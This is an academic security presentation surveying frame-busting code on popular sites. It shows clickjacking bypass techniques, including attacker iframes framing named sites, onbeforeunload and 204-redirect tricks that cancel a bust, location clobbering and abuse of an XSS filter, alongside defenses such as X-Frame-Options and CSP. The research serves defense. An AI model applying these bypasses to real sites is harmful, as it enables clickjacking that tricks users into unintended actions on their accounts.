Framebusting in the Wild

A survey of framebusting code used at popular sites

Gustav Rydstedt, Elie Bursztein, Dan Boneh, Collin Jackson


What is frame busting?

HTML allows any site to frame any URL with an <iframe> (internal frame).


Ignored by most browsers 


What is frame busting? 


Frame busting is the set of techniques a framed site uses to prevent itself from being framed.

What is frame busting?

Common frame busting code is made up of:

  a conditional statement
  a counter action

  if (top != self) {
    top.location = self.location;
  }


Why frame busting? 


Primary: Clickjacking 


Jeremiah Grossman and Robert Hansen, 2008 




Clickjacking 2.0 


(Paul Stone, BHEU '10)
Utilizing drag and drop, an attacker can:

  Grab data off the page (including source code, form data)
  Get data into the page (forms etc.)
  Fingerprint individual objects in the framed page


Survey 


Idea: grab the frame busting code from popular sites and analyze it.

Used a semi-automated crawler based on HTMLUnit.

Manual work to trace through obfuscated and packed code.


Obfuscation/Packing 


Sites found to use frame busting code:

  Top 10    60%
  Top 100   37%
  Top 500   14%


Conditional statements found:

  if (top != self)
  if (top.location != self.location)
  if (top.location != location)
  if (parent.frames.length > 0)
  if (window != top)
  if (window.top !== window.self)
  if (window.self != window.top)
  if (parent && parent != window)
  if (parent &&
      parent.frames &&
      parent.frames.length > 0)
  if ((self.parent &&
       !(self.parent === self)) &&
      (self.parent.frames.length != 0))


Counter actions found:

  top.location = self.location
  top.location.href = document.location.href
  top.location.href = self.location.href
  top.location.replace(self.location)
  top.location.href = window.location.href
  top.location.replace(document.location)
  top.location.href = "URL"
  document.write('')
  top.location = location
  top.location.replace(document.location)
  top.location.replace('URL')
  top.location.href = document.location
  top.location.replace(window.location.href)
  top.location.href = location.href
  self.parent.location = document.location
  parent.location.href = self.document.location
  top.location.href = self.location
  top.location = window.location
  top.location.replace(window.location.pathname)
  window.top.location = window.self.location

  setTimeout(function(){ document.body.innerHTML = ''; }, 1);

  window.self.onload = function(evt){ document.body.innerHTML = ''; }

  var url = window.location.href; top.location.replace(url)


All frame busting code we found was broken.


Let's check out some code. 


Courtesy of Walmart

  if (top.location != location) {
    if (document.referrer &&
        document.referrer.indexOf("walmart.com") == -1)
    {
      top.location.replace(document.location.href);
    }
  }


Error in Referrer Checking

From http://www.attacker.com/walmart.com.html:
  <iframe src="http://www.walmart.com">

Limit use of indexOf()... a substring search accepts any referrer that merely contains "walmart.com" somewhere in it.


Courtesy of The New York Times

  if (window.self != window.top &&
      !document.referrer.match(
        /https?:\/\/[^\/]+\.nytimes\.com\//))
  {
    self.location = top.location;
  }


Error in Referrer Checking

From http://www.attacker.com/a.html?b=
  <iframe src="http://www.nytimes.com">

Anchor your regular expressions: an unanchored pattern matches a nytimes.com URL anywhere in the referrer, including inside the query string.


Courtesy of US Bank

  if (self != top) {
    var domain = getDomain(document.referrer);
    var okDomains = /usbank|localhost|usonet/;
    var matchDomain = domain.search(okDomains);
    if (matchDomain == -1) {
      // frame bust
    }
  }


Error in Referrer Checking

From http://usbank.attacker.com/:
  <iframe src="http://www.usbank.com">

Don't make your regular expressions too lax: /usbank/ matches any hostname that contains the string, not only usbank.com.


Strategic Relationship?

Norwegian State Housing Bank, http://www.husbanken.no (the hostname contains "usbank", so it passes the check)

Strategic Relationship?

http://www. .org


Courtesy of Myspace

  try {
    A = !top.location.href
  } catch (B) {}

  A = A &&
    !(document.referrer.match(/^https?:\/\/[-a-z0-9.]*\.google\.(co\.|com\.)?[a-z]+\/imgres/i)) &&
    !(document.referrer.match(/^https?:\/\/([^\/]*\.)?(myspace\.com|myspace\.cn|simsidekick\.com|levisawards\.com|digg\.com)\//i));

  if (A) { /* framebust */ }


People might not frame bust


[screenshot: a Google Images search for "ace of base myspace"; the result page frames the MySpace page for Ace Of Base]


Google Images (a whitelisted "friend") does not frame bust.


Referrer = Funky Stuff

Many attacks on the referrer: washing or changing it
  Open redirect as referrer changer
  HTTPS -> HTTP washing (the referrer is dropped)

Can be hard to get the regular expression right (apparently)

"Friends" cannot be trusted
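The Walmart, New York Times and US Bank referrer checks above, side by side with a stricter check, as an added example that is not part of the slides. Each function returns true when the page would frame bust. The referrer strings are constructed to mirror the bypasses in the deck, and the getDomain() helper the US Bank snippet calls (not shown in the deck) is assumed to return the referrer's hostname, which hostOf() does here with the URL parser.

```javascript
// Added example, not from the slides: the three referrer checks mirrored as
// functions that return true when the page would frame bust, next to a stricter
// check. Sample referrers are constructed for this example.

// Hostname of a referrer, or "" when it is empty or unparsable. Stands in for
// the getDomain() helper the US Bank snippet calls (assumed; not in the deck).
function hostOf(referrer) {
  try {
    return new URL(referrer).hostname.toLowerCase();
  } catch (e) {
    return "";
  }
}

// Walmart: substring search anywhere in the referrer; an empty referrer is trusted.
function walmartStyleBusts(referrer) {
  return !!referrer && referrer.indexOf("walmart.com") === -1;
}

// NYTimes: regular expression without a leading anchor.
function nytimesStyleBusts(referrer) {
  return !/https?:\/\/[^\/]+\.nytimes\.com\//.test(referrer);
}

// US Bank: lax alternation searched inside the hostname.
function usbankStyleBusts(referrer) {
  return hostOf(referrer).search(/usbank|localhost|usonet/) === -1;
}

// Stricter check: parse the referrer, then require the hostname to equal an
// allowed host or to end with "." + that host, so the label boundary is kept.
// A missing or unparsable referrer fails closed (bust).
function strictBusts(referrer, allowedHosts) {
  var host = hostOf(referrer);
  if (!host) return true;
  var allowed = allowedHosts.some(function (a) {
    return host === a || host.endsWith("." + a);
  });
  return !allowed;
}

// Constructed referrers modelled on the bypasses in the deck.
var SAMPLES = {
  walmartLegit:    "https://www.walmart.com/cart",
  walmartPath:     "http://www.attacker.com/walmart.com.html", // host string in the path
  washed:          "",                                          // referrer stripped (HTTPS -> HTTP)
  nytLegit:        "https://www.nytimes.com/section/world",
  nytQuery:        "http://www.attacker.com/a.html?b=http://www.nytimes.com/", // match in the query
  usbankLegit:     "https://www.usbank.com/home",
  usbankSubdomain: "http://usbank.attacker.com/",              // "usbank" as the attacker's subdomain
  usbankLookalike: "http://www.husbanken.no/"                  // unrelated host containing "usbank"
};

// Does the page bust for each (check, referrer) pair? Lets the reader compare
// the lax checks with the strict one on the same inputs.
function compare() {
  var s = SAMPLES;
  return {
    walmart: {
      legit: walmartStyleBusts(s.walmartLegit),                 // false: correct
      path: walmartStyleBusts(s.walmartPath),                   // false: bypassed
      washed: walmartStyleBusts(s.washed),                      // false: bypassed
      strictLegit: strictBusts(s.walmartLegit, ["walmart.com"]), // false: still correct
      strictPath: strictBusts(s.walmartPath, ["walmart.com"]),   // true
      strictWashed: strictBusts(s.washed, ["walmart.com"])       // true
    },
    nytimes: {
      legit: nytimesStyleBusts(s.nytLegit),                     // false: correct
      query: nytimesStyleBusts(s.nytQuery),                     // false: bypassed
      strictQuery: strictBusts(s.nytQuery, ["nytimes.com"])     // true
    },
    usbank: {
      legit: usbankStyleBusts(s.usbankLegit),                   // false: correct
      subdomain: usbankStyleBusts(s.usbankSubdomain),           // false: bypassed
      lookalike: usbankStyleBusts(s.usbankLookalike),           // false: bypassed
      strictSubdomain: strictBusts(s.usbankSubdomain, ["usbank.com"]), // true
      strictLookalike: strictBusts(s.usbankLookalike, ["usbank.com"])  // true
    }
  };
}
```

The strict check closes the substring, anchoring and label-boundary holes, and it fails closed on a washed referrer, which the Walmart code silently trusted. It does nothing against a whitelisted site's open redirect or a "friend" that itself does not frame bust: a hostname is only as trustworthy as the sites on the list.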


Facebook Dark Layer

[screenshot: Facebook's "My Account" settings page (Networks, Notifications, Mobile, Language, Payments, Facebook Ads; Username, Password, Linked Accounts, Privacy, Deactivate Account) dimmed by a black overlay]


Courtesy of Facebook

Facebook deploys an exotic variant:

  if (top != self) {
    try {
      if (top.location.hostname.indexOf("apps") >= 0) throw 1;
    } catch (e) {
      window.document.write("<div style='background: black; opacity: 0.5; filter: alpha(opacity = 50); position: absolute; top: 0px; left: 0px; width: 9999px; height: 9999px; z-index: 1000001' onClick='top.location.href=window.location.href'></div>");
    }
  }

Instead of navigating away, it covers the framed page with a half-transparent black layer, 9999px on each side, that only navigates to Facebook when clicked.


Facebook - Ray of Light!

All Facebook content is centered! With a very wide frame we can push the content past the 9999px overlay, into the "ray of light":

  <iframe width="..." height="2500px" src="http://facebook.com">

  <script>
    window.scrollTo(10200, 0);
  </script>


Facebook - Ray of Light!

[screenshot: the Facebook "My Account" page (Name, Username, email contact information, Password, Linked Accounts, Privacy, Deactivate Account) scrolled so that the settings sit outside the dark overlay]


Courtesy of many

  if (top.location != self.location) {
    parent.location = self.location;
  }

Double Framing! With two levels of framing (attacker page -> attacker's inner frame -> victim), parent is the attacker's intermediate frame rather than top. The descendant policy described below does not let the victim navigate that frame, so the bust fails and the victim stays framed.


Descendant Policy

Introduced in (Adam Barth, Collin Jackson, and John Mitchell, 2009).

A frame can navigate only its descendants.

top.location = self.location is always okay.


Location Clobbering

  if (top.location != self.location) {
    top.location = self.location;
  }

If top.location can be changed or disabled, this code is...

But our trusted browser would never let such atrocities happen...


Location Clobbering 


  var location = "clobbered";

  window.__defineSetter__("location", function(){});

top.location is now "clobbered", and the framed page's assignment to it no longer navigates anything.

http://code.google.com/p/browsersec/wiki/Part2#Arbitrary_page_mashups_(UI_redressing)


Asking Nicely 


The user can cancel any navigation made by frame busting code.

The attacker just needs to ask...

  <script>
  window.onbeforeunload = function() {
    return "Do you want to leave PayPal?";
  }
  </script>
  <iframe src="http://www.paypal.com">


Asking Nicely

[screenshot: a framed PayPal page behind the browser's "Confirm" dialog: "Are you sure you want to navigate away from this page? Do you want to leave PayPal? Press OK to continue, or Cancel to stay on the current page." with Cancel and OK buttons]


Asking Nicely 


Actually, we don't have to ask nicely at all. Most browsers allow the navigation to be cancelled without any prompt:

  var prevent_bust = 0
  window.onbeforeunload = function() { prevent_bust++ }
  setInterval(function() {
    if (prevent_bust > 0) {
      prevent_bust -= 2
      window.top.location = 'http://no-content-204.com'
    }
  }, 1)
  <iframe src="http://www.victim.com">

http://coderrr.wordpress.com/2009/02/13/preventing-frame-busting-and-click-jacking-ui-redressing


Restricted zones

  <iframe security="restricted" src="http://www.victim.com">

JavaScript and cookies disabled

  <iframe sandbox src="http://www.victim.com">

JavaScript disabled (cookies still there)

designMode = on (Paul Stone, BHEU '10)
JavaScript disabled (more cookies)


Reflective XSS filters

Internet Explorer 8 introduced reflective XSS filters:

  http://www.victim.com?var=<script>alert('xss')

If the injected string appears in the rendered page, the filter rewrites it so that it does not execute.

Reflective XSS filters

Can be used to target frame busting (Eduardo Vela '09). The victim's own frame busting script is reflected in the URL, so the filter neuters the real one:

  <script> if(top.location != self.location) //framebust </script>

  http://www.victim.com?var=<script> if(top

  <sc#ipt> if(top.location != self.location)

Chrome's XSS auditor, same problem.


Is there any hope?

Well, sort of...

X-Frame-Options (IE8)

HTTP header sent on responses. Two possible values: DENY and SAMEORIGIN.

On DENY, the page will not render in a framed context.

On SAMEORIGIN, the page only renders if the top frame is the same origin as the page giving the directive.

X-Frame-Options

Good adoption by browsers (all but Firefox; coming in 3.7)

Poor adoption by sites (4 out of the top 10,000, survey by sans.org)

Some limitations: per-page policy, no whitelisting, and proxy problems.

Content Security Policy (FF)

Also an HTTP header.

Allows the site to specify restrictions/abilities.

A directive can specify allowed framers.

Still in beta, coming in Firefox 3.7
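A small model of how a browser evaluates the two header defenses just described, X-Frame-Options with the values DENY and SAMEORIGIN and a Content Security Policy directive that lists allowed framers, as an added example that is not part of the slides. The directive name frame-ancestors and the rule that it takes precedence over X-Frame-Options come from the CSP specification, not from the deck; the URLs are constructed, and the evaluation is a simplification for reasoning about policies, not browser code.

```javascript
// Added example, not from the slides: a model of how a browser decides whether a
// framed response may render under X-Frame-Options (DENY / SAMEORIGIN) and the
// CSP frame-ancestors directive. Simplified; all URLs are constructed.

function originOf(url) {
  var u = new URL(url);
  return u.protocol + "//" + u.host;
}

// X-Frame-Options: DENY never renders framed; SAMEORIGIN renders only when the
// top-level document has the framed page's origin. Missing or unknown value: no policy.
function xfoAllows(value, pageUrl, topUrl) {
  if (!value) return true;
  var v = value.trim().toUpperCase();
  if (v === "DENY") return false;
  if (v === "SAMEORIGIN") return originOf(pageUrl) === originOf(topUrl);
  return true;
}

// Source list of the frame-ancestors directive in a CSP header, or null when
// the header has no such directive.
function frameAncestorsSources(csp) {
  if (!csp) return null;
  var directives = csp.split(";");
  for (var i = 0; i < directives.length; i++) {
    var tokens = directives[i].trim().split(/\s+/);
    if (tokens[0].toLowerCase() === "frame-ancestors") return tokens.slice(1);
  }
  return null;
}

// frame-ancestors: 'none' blocks, 'self' allows the page's own origin, an origin
// such as https://partner.example allows exactly that origin, and a bare host with
// a "*." prefix allows any subdomain (scheme-prefixed wildcards are not modelled).
// An empty source list allows nothing.
function frameAncestorsAllows(sources, pageUrl, topUrl) {
  var topOrigin = originOf(topUrl);
  var topHost = new URL(topUrl).hostname.toLowerCase();
  return sources.some(function (src) {
    if (src === "'none'") return false;
    if (src === "'self'") return originOf(pageUrl) === topOrigin;
    if (src.indexOf("*.") === 0) return topHost.endsWith(src.slice(1));
    if (src.indexOf("://") !== -1) return originOf(src) === topOrigin;
    return src.toLowerCase() === topHost;
  });
}

// Decide for one response. When frame-ancestors is present it takes precedence
// over X-Frame-Options, as the CSP specification orders the two.
function framingAllowed(headers, pageUrl, topUrl) {
  var sources = frameAncestorsSources(headers["Content-Security-Policy"]);
  if (sources !== null) return frameAncestorsAllows(sources, pageUrl, topUrl);
  return xfoAllows(headers["X-Frame-Options"], pageUrl, topUrl);
}

// Defender side: the header pair to send. X-Frame-Options cannot whitelist (a
// limitation the deck notes), so when framers are allowed it carries SAMEORIGIN:
// a browser without CSP support then blocks the partners but still lets the site
// frame itself, erring toward blocking rather than toward open framing.
function frameHeadersFor(allowedFramers) {
  if (allowedFramers.length === 0) {
    return { "X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'" };
  }
  return {
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Security-Policy": "frame-ancestors 'self' " + allowedFramers.join(" ")
  };
}

// Worked case: a page that allows one partner to frame it, probed from three tops.
function demo() {
  var page = "https://www.victim.example/account";
  var headers = frameHeadersFor(["https://partner.example"]);
  return {
    self: framingAllowed(headers, page, "https://www.victim.example/"),   // true
    partner: framingAllowed(headers, page, "https://partner.example/embed"), // true
    attacker: framingAllowed(headers, page, "https://www.attacker.example/") // false
  };
}
```

The header keys are looked up exactly as written; a real server stack normalises header names, which the model leaves out.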


Best for now
(but still not good)

  <style>html { visibility: hidden }</style>
  <script>
  if (self == top) {
    document.documentElement.style.visibility = 'visible';
  } else {
    top.location = self.location;
  }
  </script>

The page is hidden by default and only revealed when it is not framed, so a blocked bust leaves the attacker with a blank frame instead of a clickable page.


... a little bit more.

These sites (among others) do frame busting...

... but do these?

  Facebook               http://m.facebook.com/
  MSN                    http://home.mobile.msn.com/
  GMail                  http://m.gmail.com
  Baidu                  http://m.baidu.com
  Twitter                http://mobile.twitter.com
  MegaVideo              http://mobile.megavideo.com/
  Tube8                  http://m.tube8.com
  PayPal                 http://mobile.paypal.com
  USBank                 http://mobile.usbank.com
  First Interstate Bank  http://firstinterstate.mobi
  NewEgg                 http://m.newegg.com/
  MetaCafe               http://m.metacafe.com/
  RenRen                 http://m.renren.com/
  MySpace                http://m.myspace.com
  VKontakte              http://pda.vkontakte.ru/
  WellsFargo             https://m.wf.com/
  NyTimes                http://m.nytimes.com
  E-Zine Articles        http://m.ezinearticles.com

No, they generally don't... (per site the finding was "No", or "Redirect" where the mobile page merely redirects)


Summary 


All frame busting code out there can be broken across browsers in several different ways.

Defenses are on the way, but not yet widely adopted.

Relying on the referrer is difficult.
If JS is disabled, don't render the page.
Frame bust your mobile sites!


Questions? 


rydstedt@stanford.edu 


